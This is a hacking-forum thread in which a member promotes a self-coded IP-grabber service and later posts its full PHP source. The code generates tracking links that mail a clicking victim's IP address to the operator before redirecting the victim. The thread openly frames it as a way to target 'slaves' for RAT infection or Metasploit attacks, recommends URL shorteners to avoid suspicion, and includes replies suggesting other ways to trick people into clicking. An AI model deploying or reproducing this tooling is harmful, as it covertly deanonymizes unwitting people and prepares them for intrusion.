[EASY]Find IP Address Of Your Slave

[The Alchemist]

EASILY FIND SLAVE'S IP ADDRESS The Alchemist's WAY

Hello Evilzone, so, I finally finished my coding and I'm off to share it with you guys...


This is a method of getting the IP address of the slave and making him redirect to another page so that the slave does not have any suspicion on you..


All this service does is, it takes in your email id and a redirection address and generates a link for you. Its your work to make your slave click on that link. Once the slave clicks that link, his IP address gets sent to your email id. Thats it...


You may use this service for infecting the slave with a RAT or do a lot of things using metaspoilt. Grab the IP address of the slave and redirect him to your server's download link....


So, here is the process of using this service :
1. Go to this link. Its my own website and my own page.
The page looks something like this :





Here, you have to enter your email id where the slave's IP address will be mailed. And, also the link where you want the slave to be redirected. Once your link is generated, its your job to social engineer your slave and make him open the link. The generated link is valid for the rest of the day.
WHEN YOU SEND YOUR LINK TO THE SLAVE, IT IS RECOMMENDED THAT YOU SHORTEN YOUR LINK USING GOOGLE URL SHORTENER IN ORDER TO PREVENT SUSPICION. YOU'LL ATLEAST GET THE IP ADDRESS OF YOUR SLAVE.


2. Once your slave opens the link, he'll see a screen like this :





As this page opens up, the slave's IP address will be mailed to your email id that you'd given. Then, as the page says "Click here to continue." Once the slave clicks on the link behind "here", he'll be redirected to the redirection address you'd given.


I coded this all by myself and I hope you guys like it... I can also share the source codes if you guys want..
You may think that this site is like http://www.whatstheirip.com but NO!! This site provides custom redirection that whatstheirip does not provide.


Thats all....
Enjoy hacking...

PLEASE GIVE FEEDBACK!!!


THREAD UPDATE : You may also use this link if you find the previous one to be too suspicious. This one directly redirects your slave to the redirection address without showing that "Click here to continue" page. Now, if you use google URL shortener, there's no chance of getting suspected.

[Stackprotector]

I am sure you know what everyone is going to say right?.

[The Alchemist]

I am sure you know what everyone is going to say right?.

Nope... I hope they do not say something bad... What do you say??

[Stackprotector]

The most suspicious thing would be a page with ad's on it saying click here to continue >.<. Also giving someone a link to something like blacklabs.fav.cc.  Good to learn to create these things. But i think you are better of sharing the code and experience rather than this service

[The Alchemist]

The most suspicious thing would be a page with ad's on it saying click here to continue >.<. Also giving someone a link to something like blacklabs.fav.cc.  Good to learn to create these things. But i think you are better of sharing the code and experience rather than this service

Ok.... You are right...
But, careless people wont observe it...
Thanks for the feedback..


Modified the thread... Google URL shortener recommended to prevent suspicion...

[Daemon]

I feel as though this post is insulting our intelligence a little...its a nifty tool but we don't really need step by step instructions for it since its so simple to use. What I personally would rather see is a link to the tool, some of the uses for it especially the more outta the box ones, and source code or if not the full source code then a general idea of how you did it.
Like I said, pretty sweet tool, but this post doesn't really have anything of substance to it...sorry mate. Give us moar!!!!

Hmm. Perhaps just a quick little 1-5 with written instructions might work next time if you feel the need to explain something like this.

[Live Wire]

Cool, but why not just send him a regular email, then get the ip from the header in reply? And even though this would only output a server/ISP ip address, this tool outputs the same same thing, right? Or, assuming youre on the same network, just wireshark it. But cool program! And yeah, source would be nice.

[Stackprotector]

Cool, but why not just send him a regular email, then get the ip from the header in reply? And even though this would only output a server/ISP ip address, this tool outputs the same same thing, right? Or, assuming youre on the same network, just wireshark it. But cool program! And yeah, source would be nice.

Today most people use webmail services and most isp's protected the ip in direct POP3 emailing. And if you are requesting a website the website owner can achieve your real ip address, this is used for logging and user sessions, and also geo-location statistics.

[Live Wire]

Okay. Yeah, I'm going to stick with port forwarding my router to my metasploit box, redirecting from there, and tricking them to click that link. Also, nothing personal against Alchemist, but something in me says not to input my email into some random text box. No offense meant at all, I'm just saying...

[Axon]

You do realize that colouring your text doesn't make you l33t, nevertheless thank you for sharing, it doesn't interest me at the moment but am sure it will come in handy in the future.

[The Alchemist]

Today most people use webmail services and most isp's protected the ip in direct POP3 emailing. And if you are requesting a website the website owner can achieve your real ip address, this is used for logging and user sessions, and also geo-location statistics.

Thats hell right!!!

I feel as though this post is insulting our intelligence a little...its a nifty tool but we don't really need step by step instructions for it since its so simple to use. What I personally would rather see is a link to the tool, some of the uses for it especially the more outta the box ones, and source code or if not the full source code then a general idea of how you did it.
Like I said, pretty sweet tool, but this post doesn't really have anything of substance to it...sorry mate. Give us moar!!!!

Hmm. Perhaps just a quick little 1-5 with written instructions might work next time if you feel the need to explain something like this.

Ok... Im sharing the source code.... As you say...

Okay. Yeah, I'm going to stick with port forwarding my router to my metasploit box, redirecting from there, and tricking them to click that link. Also, nothing personal against Alchemist, but something in me says not to input my email into some random text box. No offense meant at all, I'm just saying...

Well, for all these stuff, you should always use a different email id that is only for hack - related stuff if you want to feel secure.

You do realize that colouring your text doesn't make you l33t, nevertheless thank you for sharing, it doesn't interest me at the moment but am sure it will come in handy in the future.

Well, I'm not a l33t and I'm not trying to prove that I'm one... But, I'll be highly obliged if you find this tool in handy some day...

[The Alchemist]

Here is the source code :

For generate.php

Code: (php) [Select]

<html>
<head>
<meta http-equiv="author" content="The Alchemist"/>
<title>
IP Grabber
</title>
</head>
<body background="http://fc00.deviantart.net/fs70/i/2011/324/9/2/black___purple_textures_by_paralyzinglove-d4gscvx.jpg">
<p align=center>
<img src="http://i67.photobucket.com/albums/h298/bcfcrule11/theAlchemist.png" alt="The Alchemist - IP Grabber" /></p>
<form name="ipgrab" action="<?php $PHP_SELF; ?>" method="POST">
<p align="center"><label for="email"><b><font size="5" color=c0c0c0>Your email :</b></font></label>
<input name="email" type="text"/><br><br><br><br>
<label for="redir"><b><font size="5" color=c0c0c0>Redirection Address :</b></font></label>
<input name="redir" type="text" value="http://"/><br><br><br><br>
<input type="submit" name="submit" value="Generate"/></p><br><br><br><br><br><br></p>
<p align="center"><font color=c0c0c0 size="5">
<?php
if(isset($_POST['email']) && isset($_POST['redir']) && isset($_POST['submit']))
{
    $hostname='something';
    $user='something';
    $password='something';
    $dbname='something';
    $con=mysql_connect($hostname, $user, $password) or DIE('Connection to host is failed, perhaps the service is down!');
    mysql_select_db($dbname,$con) or DIE('Database name is not available!');
    $email=trim(mysql_real_escape_string(htmlentities($_POST['email'])));
    $redir=trim(mysql_real_escape_string(htmlentities($_POST['redir'])));
    $d=date('d');
    $m=date('m');
    $y=date('Y');
    $full=date('Y-m-d H:i:s');
    $id=sha1($email.$full);
    $query=mysql_query("INSERT INTO ipgrabber(email,redir,id,date,month,year)VALUES('$email','$redir','$id','$d','$m','$y')",$con);
    if($query)
    {
        echo 'Link successfully generated!! Valid for the rest of the day.<br><br>';
        echo 'Link for your victim is http://www.blacklabs.fav.cc/links/redir.php?id='.$id.'</font></p>';
    }
    else
    {
        die('Error in generating the link');
    }
}
?>
</font>
</p><br><br>
<p align="center"><img src="http://www.123myip.co.uk/ip-address/?size=468x60"></p>
</body>
</html>

For the redir.php

Code: (php) [Select]

<html>
<head>
<meta http-equiv="author" content="The Alchemist"/>
<title>
Continue
</title>
</head>
<body>
<h2>
<?php
if(isset($_GET['id']))
{
    $hostname='something';
    $user='something';
    $password='something';
    $dbname='something';
    $con=mysql_connect($hostname, $user, $password) or DIE('Connection to host is failed, perhaps the service is down!');
    mysql_select_db($dbname,$con) or DIE('Database name is not available!');
    $gid=trim(mysql_real_escape_string(htmlentities($_GET['id'])));
    $query=mysql_query("SELECT * FROM ipgrabber WHERE id='$gid'",$con);
    $num=mysql_num_rows($query);
    if($num==0)
    {
        echo 'This link does not exist';
    }
    else
    {
        $values=mysql_fetch_assoc($query);
        $d=(int)date('d');
        $d1=(int)$values['date'];
        $m=(int)date('m');
        $m1=(int)$values['month'];
        $y=(int)date('Y');
        $y1=(int)$values['year'];
        if($y>$y1 || ($y==$y1 && $m>$m1) || ($y==$y1 && $m==$m1 && $d>$d1))
        {
            echo 'The link has crossed its validity period';
        }
        else
        {
            $contents="Your victim's IP address is ".$_SERVER['REMOTE_ADDR']." Victim opened your link at ".date('Y-m-d H:i:s');
            $victim="Victim IP";
            $my="IPGRABBER@blacklabs.fav.cc";
            $headers = "From: VICTIM IP<".$my.">rn";
            @mail($values['email'],$victim,$contents,$headers);
            echo 'Click ';?>
            <a href="<?php echo $values['redir']; ?>"/>
            <?php
            echo 'here</a> to continue.';
        }
    }
}
?>
</h2>
</body>
</html>


[techb]

pI was going to lock this based on the original post due to the un-needed text coloring, and reading like a spam bot. But by the comments and posting of alleged source it will remain open for discussion. Just a future note and warning, don't use multicolored text and the like unless it is necessary or enhances the post.

[The Alchemist]

pI was going to lock this based on the original post due to the un-needed text coloring, and reading like a spam bot. But by the comments and posting of alleged source it will remain open for discussion. Just a future note and warning, don't use multicolored text and the like unless it is necessary or enhances the post.

Ok... I'll remember that from next time... Thanks for informing..
Anything that you would say about the source code or the service?

[Live Wire]

Did you hard code these, or use some program?